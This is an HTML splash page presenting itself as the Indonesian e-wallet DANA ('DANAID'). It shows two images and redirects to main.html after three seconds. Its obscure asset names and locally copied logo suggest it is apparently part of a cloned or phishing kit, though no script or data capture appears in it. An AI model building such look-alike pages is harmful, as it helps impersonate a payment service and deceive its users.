<!DOCTYPE html><html><head>
<meta data-n-head="ssr" charset="utf-8">
<meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv='refresh' content='3; URL=main.html'>
<meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content="#118EEA">
<meta data-n-head="ssr" data-hid="apple-mobile-web-app-status-bar-style" name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://a.m.dana.id/danaweb/web/dana-meta-logo.png">
<meta data-n-head="ssr" data-hid="og:image" property="og:image" content="images/dana-meta-logo.png">
<meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" content="">
<meta data-n-head="ssr" data-hid="description" name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik.">
<meta data-n-head="ssr" data-hid="twitter:title" name="twitter:title" content="DANAID">
<meta data-n-head="ssr" data-hid="twitter:description" name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik.">
<meta data-n-head="ssr" data-hid="og:title" name="og:title" content="DANAID">
<meta data-n-head="ssr" data-hid="og:description" name="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik.">
<meta data-n-head="ssr" data-hid="keywords" name="keywords" content="">
<link data-n-head="ssr" rel="icon" type="image/x-icon" href="gyrozyeemg/.png">
<link data-n-head="ssr" rel="preconnect" href="">
<link data-n-head="ssr" rel="dns-prefetch" href="">
<title>DANAID</title>
    <link rel="icon" href="gyrozyeemg/.png" type="image/png" sizes="32x32">
    <link rel="stylesheet" href="css/ahs.css">
    <link href="css/boxicons.min.css" rel="stylesheet">
</head>
<body>

 
 <div class="awldn">
  <img class="st-lg" src="images/ahs-lgd.png">
  <img class="gryz" src="images/gz-ktrft.jpg">
 </div>


</body></html>